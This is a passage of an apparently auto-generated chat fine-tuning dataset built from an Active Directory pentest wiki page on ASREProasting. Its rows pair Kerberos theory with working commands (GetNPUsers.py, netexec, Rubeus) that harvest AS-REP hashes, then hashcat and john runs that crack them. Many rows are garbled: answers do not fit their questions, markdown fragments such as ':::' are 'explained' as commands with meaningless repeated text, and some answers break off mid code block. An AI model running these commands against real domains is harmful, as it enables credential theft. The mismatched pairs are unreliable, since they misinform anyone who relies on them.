AD-CS NTLM relay attacks (HTTPS, EPA (Extended Protection for Authentication) and encryption enforced).", "metadata": {"corpus_index": 498, "category": "active_directory", "source_file": "docs/src/ad/movement/index.md", "page_title": "Movement", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Movement - Active Directory Certificate Services"}, {"role": "assistant", "content": "* [ ] The CA is configured correctly (the EDITF_ATTRIBUTESUBJECTALTNAME2 flag is not set). This prevents the corresponding domain escalation attack.\n* [ ] There are no certificate templates that are badly configured. This prevents the corresponding domain escalation attack.\n* [ ] AD-CS web and RPC endpoints are secured against AD-CS NTLM relay attacks (HTTPS, EPA (Extended Protection for Authentication) and encryption enforced)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Movement - Active Directory Certificate Services", "response": "* [ ] The CA is configured correctly (the EDITF_ATTRIBUTESUBJECTALTNAME2 flag is not set). This prevents the corresponding domain escalation attack.\n* [ ] There are no certificate templates that are badly configured. This prevents the corresponding domain escalation attack.\n* [ ] AD-CS web and RPC endpoints are secured against AD-CS NTLM relay attacks (HTTPS, EPA (Extended Protection for Authentication) and encryption enforced).", "metadata": {"corpus_index": 498, "category": "active_directory", "source_file": "docs/src/ad/movement/index.md", "page_title": "Movement", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about ASREProast - Theory"}, {"role": "assistant", "content": "The Kerberos authentication protocol works with tickets in order to grant access. A ST (Service Ticket) can be obtained by presenting a TGT (Ticket Granting Ticket). That prior TGT can be obtained by validating a first step named \"pre-authentication\" (except if that requirement is explicitly removed for some accounts, making them vulnerable to ASREProast).\n\nThe pre-authentication requires the requesting user to supply its secret key (DES, RC4, AES128 or AES256) derived from the user password. Technically, when asking the KDC (Key Distribution Center) for a TGT (Ticket Granting Ticket), the requesting user needs to validate pre-authentication by sending a timestamp encrypted with it's own credentials. It ensures the user is requesting a TGT for himself. Once validated, the TGT is then sent to the user in the KRB_AS_REP message, but that message also contains a session key. That session key is encrypted with the requested user's NT hash.\n\nBecause some applications don't support Kerberos preauthentication, it is common to find users with Kerberos preauthentication disabled, hence allowing attackers to request TGTs for these users and crack the session keys offline. This is ASREProasting.\n\nWhile this technique can possibly allow to retrieve a user's credentials, the TGT obtained in the KRB_AS_REP messages are encrypted cannot be used without knowledge of the account's password."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about ASREProast - Theory", "response": "The Kerberos authentication protocol works with tickets in order to grant access. A ST (Service Ticket) can be obtained by presenting a TGT (Ticket Granting Ticket). That prior TGT can be obtained by validating a first step named \"pre-authentication\" (except if that requirement is explicitly removed for some accounts, making them vulnerable to ASREProast).\n\nThe pre-authentication requires the requesting user to supply its secret key (DES, RC4, AES128 or AES256) derived from the user password. Technically, when asking the KDC (Key Distribution Center) for a TGT (Ticket Granting Ticket), the requesting user needs to validate pre-authentication by sending a timestamp encrypted with it's own credentials. It ensures the user is requesting a TGT for himself. Once validated, the TGT is then sent to the user in the KRB_AS_REP message, but that message also contains a session key. That session key is encrypted with the requested user's NT hash.\n\nBecause some applications don't support Kerberos preauthentication, it is common to find users with Kerberos preauthentication disabled, hence allowing attackers to request TGTs for these users and crack the session keys offline. This is ASREProasting.\n\nWhile this technique can possibly allow to retrieve a user's credentials, the TGT obtained in the KRB_AS_REP messages are encrypted cannot be used without knowledge of the account's password.", "metadata": {"corpus_index": 499, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for ASREProast - Theory"}, {"role": "assistant", "content": "The Kerberos authentication protocol works with tickets in order to grant access. A ST (Service Ticket) can be obtained by presenting a TGT (Ticket Granting Ticket). That prior TGT can be obtained by validating a first step named \"pre-authentication\" (except if that requirement is explicitly removed for some accounts, making them vulnerable to ASREProast).\n\nThe pre-authentication requires the requesting user to supply its secret key (DES, RC4, AES128 or AES256) derived from the user password. Technically, when asking the KDC (Key Distribution Center) for a TGT (Ticket Granting Ticket), the requesting user needs to validate pre-authentication by sending a timestamp encrypted with it's own credentials. It ensures the user is requesting a TGT for himself. Once validated, the TGT is then sent to the user in the KRB_AS_REP message, but that message also contains a session key. That session key is encrypted with the requested user's NT hash.\n\nBecause some applications don't support Kerberos preauthentication, it is common to find users with Kerberos preauthentication disabled, hence allowing attackers to request TGTs for these users and crack the session keys offline. This is ASREProasting.\n\nWhile this technique can possibly allow to retrieve a user's credentials, the TGT obtained in the KRB_AS_REP messages are encrypted cannot be used without knowledge of the account's password."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for ASREProast - Theory", "response": "The Kerberos authentication protocol works with tickets in order to grant access. A ST (Service Ticket) can be obtained by presenting a TGT (Ticket Granting Ticket). That prior TGT can be obtained by validating a first step named \"pre-authentication\" (except if that requirement is explicitly removed for some accounts, making them vulnerable to ASREProast).\n\nThe pre-authentication requires the requesting user to supply its secret key (DES, RC4, AES128 or AES256) derived from the user password. Technically, when asking the KDC (Key Distribution Center) for a TGT (Ticket Granting Ticket), the requesting user needs to validate pre-authentication by sending a timestamp encrypted with it's own credentials. It ensures the user is requesting a TGT for himself. Once validated, the TGT is then sent to the user in the KRB_AS_REP message, but that message also contains a session key. That session key is encrypted with the requested user's NT hash.\n\nBecause some applications don't support Kerberos preauthentication, it is common to find users with Kerberos preauthentication disabled, hence allowing attackers to request TGTs for these users and crack the session keys offline. This is ASREProasting.\n\nWhile this technique can possibly allow to retrieve a user's credentials, the TGT obtained in the KRB_AS_REP messages are encrypted cannot be used without knowledge of the account's password.", "metadata": {"corpus_index": 499, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of ASREProast - Practice"}, {"role": "assistant", "content": "> [!TIP]\n> While this attack can be carried out without any prior foothold (domain user credentials), there is no way of finding out users with Do not require Kerberos preauthentication set without that prior foothold.\n\n::: tabs\n\n=== UNIX-like\n\nThe Impacket script GetNPUsers (Python) can get TGTs for the users that have the property Do not require Kerberos preauthentication set.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of ASREProast - Practice", "response": "> [!TIP]\n> While this attack can be carried out without any prior foothold (domain user credentials), there is no way of finding out users with Do not require Kerberos preauthentication set without that prior foothold.\n\n::: tabs\n\n=== UNIX-like\n\nThe Impacket script GetNPUsers (Python) can get TGTs for the users that have the property Do not require Kerberos preauthentication set.\n\n```bash", "metadata": {"corpus_index": 500, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute ASREProast - Practice?"}, {"role": "assistant", "content": "> [!TIP]\n> While this attack can be carried out without any prior foothold (domain user credentials), there is no way of finding out users with Do not require Kerberos preauthentication set without that prior foothold.\n\n::: tabs\n\n=== UNIX-like\n\nThe Impacket script GetNPUsers (Python) can get TGTs for the users that have the property Do not require Kerberos preauthentication set.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute ASREProast - Practice?", "response": "> [!TIP]\n> While this attack can be carried out without any prior foothold (domain user credentials), there is no way of finding out users with Do not require Kerberos preauthentication set without that prior foothold.\n\n::: tabs\n\n=== UNIX-like\n\nThe Impacket script GetNPUsers (Python) can get TGTs for the users that have the property Do not require Kerberos preauthentication set.\n\n```bash", "metadata": {"corpus_index": 500, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe users list dynamically queried with an LDAP anonymous bind in the context of penetration testing"}, {"role": "assistant", "content": "GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe users list dynamically queried with an LDAP anonymous bind in the context of penetration testing", "response": "GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'", "metadata": {"corpus_index": 501, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute users list dynamically queried with an LDAP anonymous bind?"}, {"role": "assistant", "content": "GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute users list dynamically queried with an LDAP anonymous bind?", "response": "GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'", "metadata": {"corpus_index": 501, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about with a users file?"}, {"role": "assistant", "content": "GetNPUsers.py -usersfile users.txt -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about with a users file?", "response": "GetNPUsers.py -usersfile users.txt -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'", "metadata": {"corpus_index": 502, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on with a users file"}, {"role": "assistant", "content": "GetNPUsers.py -usersfile users.txt -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on with a users file", "response": "GetNPUsers.py -usersfile users.txt -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'", "metadata": {"corpus_index": 502, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain users list dynamically queried with a LDAP authenticated bind (password)"}, {"role": "assistant", "content": "GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain users list dynamically queried with a LDAP authenticated bind (password)", "response": "GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'", "metadata": {"corpus_index": 503, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on users list dynamically queried with a LDAP authenticated bind (password)"}, {"role": "assistant", "content": "GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on users list dynamically queried with a LDAP authenticated bind (password)", "response": "GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'", "metadata": {"corpus_index": 503, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is users list dynamically queried with a LDAP authenticated bind (NT hash)?"}, {"role": "assistant", "content": "GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'\n``\n\nThis can also be achieved with NetExec (Python).\n\n`bash\nnetexec ldap $TARGETS -u $USER -p $PASSWORD --asreproast ASREProastables.txt --kdcHost $KeyDistributionCenter\n`\n\nThe kerberoast pure-python toolkit is a good alternative to the tools mentioned above.\n\n=== Windows\n\nThe same thing can be done with Rubeus from a session running with a domain user privileges.\n\n`powershell\nRubeus.exe asreproast /format:hashcat /outfile:ASREProastables.txt\n`\n\n:::\n\nDepending on the output format used (hashcat or john), hashcat and JohnTheRipper can be used to try cracking the hashes.\n\n`bash\nhashcat -m 18200 -a 0 ASREProastables.txt $wordlist\n`\n\n`bash\njohn --wordlist=$wordlist ASREProastables.txt\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is users list dynamically queried with a LDAP authenticated bind (NT hash)?", "response": "GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'\n``\n\nThis can also be achieved with NetExec (Python).\n\n`bash\nnetexec ldap $TARGETS -u $USER -p $PASSWORD --asreproast ASREProastables.txt --kdcHost $KeyDistributionCenter\n`\n\nThe kerberoast pure-python toolkit is a good alternative to the tools mentioned above.\n\n=== Windows\n\nThe same thing can be done with Rubeus from a session running with a domain user privileges.\n\n`powershell\nRubeus.exe asreproast /format:hashcat /outfile:ASREProastables.txt\n`\n\n:::\n\nDepending on the output format used (hashcat or john), hashcat and JohnTheRipper can be used to try cracking the hashes.\n\n`bash\nhashcat -m 18200 -a 0 ASREProastables.txt $wordlist\n`\n\n`bash\njohn --wordlist=$wordlist ASREProastables.txt\n``", "metadata": {"corpus_index": 504, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for users list dynamically queried with a LDAP authenticated bind (NT hash)"}, {"role": "assistant", "content": "GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'\n``\n\nThis can also be achieved with NetExec (Python).\n\n`bash\nnetexec ldap $TARGETS -u $USER -p $PASSWORD --asreproast ASREProastables.txt --kdcHost $KeyDistributionCenter\n`\n\nThe kerberoast pure-python toolkit is a good alternative to the tools mentioned above.\n\n=== Windows\n\nThe same thing can be done with Rubeus from a session running with a domain user privileges.\n\n`powershell\nRubeus.exe asreproast /format:hashcat /outfile:ASREProastables.txt\n`\n\n:::\n\nDepending on the output format used (hashcat or john), hashcat and JohnTheRipper can be used to try cracking the hashes.\n\n`bash\nhashcat -m 18200 -a 0 ASREProastables.txt $wordlist\n`\n\n`bash\njohn --wordlist=$wordlist ASREProastables.txt\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for users list dynamically queried with a LDAP authenticated bind (NT hash)", "response": "GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'\n``\n\nThis can also be achieved with NetExec (Python).\n\n`bash\nnetexec ldap $TARGETS -u $USER -p $PASSWORD --asreproast ASREProastables.txt --kdcHost $KeyDistributionCenter\n`\n\nThe kerberoast pure-python toolkit is a good alternative to the tools mentioned above.\n\n=== Windows\n\nThe same thing can be done with Rubeus from a session running with a domain user privileges.\n\n`powershell\nRubeus.exe asreproast /format:hashcat /outfile:ASREProastables.txt\n`\n\n:::\n\nDepending on the output format used (hashcat or john), hashcat and JohnTheRipper can be used to try cracking the hashes.\n\n`bash\nhashcat -m 18200 -a 0 ASREProastables.txt $wordlist\n`\n\n`bash\njohn --wordlist=$wordlist ASREProastables.txt\n``", "metadata": {"corpus_index": 504, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the This command to users list dynamically queried with a ldap authenticated bind (nt hash)"}, {"role": "assistant", "content": "This can also be achieved with [NetExec](https://github.com/Pennyw0rth/NetExec) (Python)."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the This command to users list dynamically queried with a ldap authenticated bind (nt hash)", "response": "This can also be achieved with [NetExec](https://github.com/Pennyw0rth/NetExec) (Python).", "metadata": {"corpus_index": 505, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "This"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on users list dynamically queried with a LDAP authenticated bind (NT hash)"}, {"role": "assistant", "content": "This can also be achieved with [NetExec](https://github.com/Pennyw0rth/NetExec) (Python)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on users list dynamically queried with a LDAP authenticated bind (NT hash)", "response": "This can also be achieved with [NetExec](https://github.com/Pennyw0rth/NetExec) (Python).", "metadata": {"corpus_index": 505, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `This can also be achieved with [NetExec](https://github.com/Pennyw0rth/NetExec) (Python).`?"}, {"role": "assistant", "content": "This command is used for users list dynamically queried with a ldap authenticated bind (nt hash). users list dynamically queried with a LDAP authenticated bind (NT hash)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `This can also be achieved with [NetExec](https://github.com/Pennyw0rth/NetExec) (Python).`?", "response": "This command is used for users list dynamically queried with a ldap authenticated bind (nt hash). users list dynamically queried with a LDAP authenticated bind (NT hash)", "metadata": {"corpus_index": 505, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the The command to users list dynamically queried with a ldap authenticated bind (nt hash)"}, {"role": "assistant", "content": "The [kerberoast](https://github.com/skelsec/kerberoast) pure-python toolkit is a good alternative to the tools mentioned above.\n\n\n=== Windows\n\nThe same thing can be done with [Rubeus](https://github.com/GhostPack/Rubeus) from a session running with a domain user privileges."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the The command to users list dynamically queried with a ldap authenticated bind (nt hash)", "response": "The [kerberoast](https://github.com/skelsec/kerberoast) pure-python toolkit is a good alternative to the tools mentioned above.\n\n\n=== Windows\n\nThe same thing can be done with [Rubeus](https://github.com/GhostPack/Rubeus) from a session running with a domain user privileges.", "metadata": {"corpus_index": 506, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for users list dynamically queried with a LDAP authenticated bind (NT hash)?"}, {"role": "assistant", "content": "The [kerberoast](https://github.com/skelsec/kerberoast) pure-python toolkit is a good alternative to the tools mentioned above.\n\n\n=== Windows\n\nThe same thing can be done with [Rubeus](https://github.com/GhostPack/Rubeus) from a session running with a domain user privileges."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for users list dynamically queried with a LDAP authenticated bind (NT hash)?", "response": "The [kerberoast](https://github.com/skelsec/kerberoast) pure-python toolkit is a good alternative to the tools mentioned above.\n\n\n=== Windows\n\nThe same thing can be done with [Rubeus](https://github.com/GhostPack/Rubeus) from a session running with a domain user privileges.", "metadata": {"corpus_index": 506, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The [kerberoast](https://github.com/skelsec/kerberoast) pure-python toolkit is a good alternative to the tools mentioned above.`?"}, {"role": "assistant", "content": "This command is used for users list dynamically queried with a ldap authenticated bind (nt hash). users list dynamically queried with a LDAP authenticated bind (NT hash)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The [kerberoast](https://github.com/skelsec/kerberoast) pure-python toolkit is a good alternative to the tools mentioned above.`?", "response": "This command is used for users list dynamically queried with a ldap authenticated bind (nt hash). users list dynamically queried with a LDAP authenticated bind (NT hash)", "metadata": {"corpus_index": 506, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out users list dynamically queried with a LDAP authenticated bind (NT hash) during a pentest?"}, {"role": "assistant", "content": ":::\n\n\n\n\nDepending on the output format used (`hashcat` or `john`), [hashcat](https://github.com/hashcat/hashcat) and [JohnTheRipper](https://github.com/magnumripper/JohnTheRipper) can be used to try [cracking the hashes](../credentials/cracking.md)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out users list dynamically queried with a LDAP authenticated bind (NT hash) during a pentest?", "response": ":::\n\n\n\n\nDepending on the output format used (`hashcat` or `john`), [hashcat](https://github.com/hashcat/hashcat) and [JohnTheRipper](https://github.com/magnumripper/JohnTheRipper) can be used to try [cracking the hashes](../credentials/cracking.md).", "metadata": {"corpus_index": 507, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `:::`?"}, {"role": "assistant", "content": "This command is used for users list dynamically queried with a ldap authenticated bind (nt hash). users list dynamically queried with a LDAP authenticated bind (NT hash)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `:::`?", "response": "This command is used for users list dynamically queried with a ldap authenticated bind (nt hash). users list dynamically queried with a LDAP authenticated bind (NT hash)", "metadata": {"corpus_index": 507, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform users list dynamically queried with a LDAP authenticated bind (NT hash)?"}, {"role": "assistant", "content": "```bash\njohn --wordlist=$wordlist ASREProastables.txt"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform users list dynamically queried with a LDAP authenticated bind (NT hash)?", "response": "```bash\njohn --wordlist=$wordlist ASREProastables.txt", "metadata": {"corpus_index": 508, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: ````bash`?"}, {"role": "assistant", "content": "This command is used for users list dynamically queried with a ldap authenticated bind (nt hash). users list dynamically queried with a LDAP authenticated bind (NT hash)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: ````bash`?", "response": "This command is used for users list dynamically queried with a ldap authenticated bind (nt hash). users list dynamically queried with a LDAP authenticated bind (NT hash)", "metadata": {"corpus_index": 508, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/asreproast.md", "page_title": "ASREProast", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what 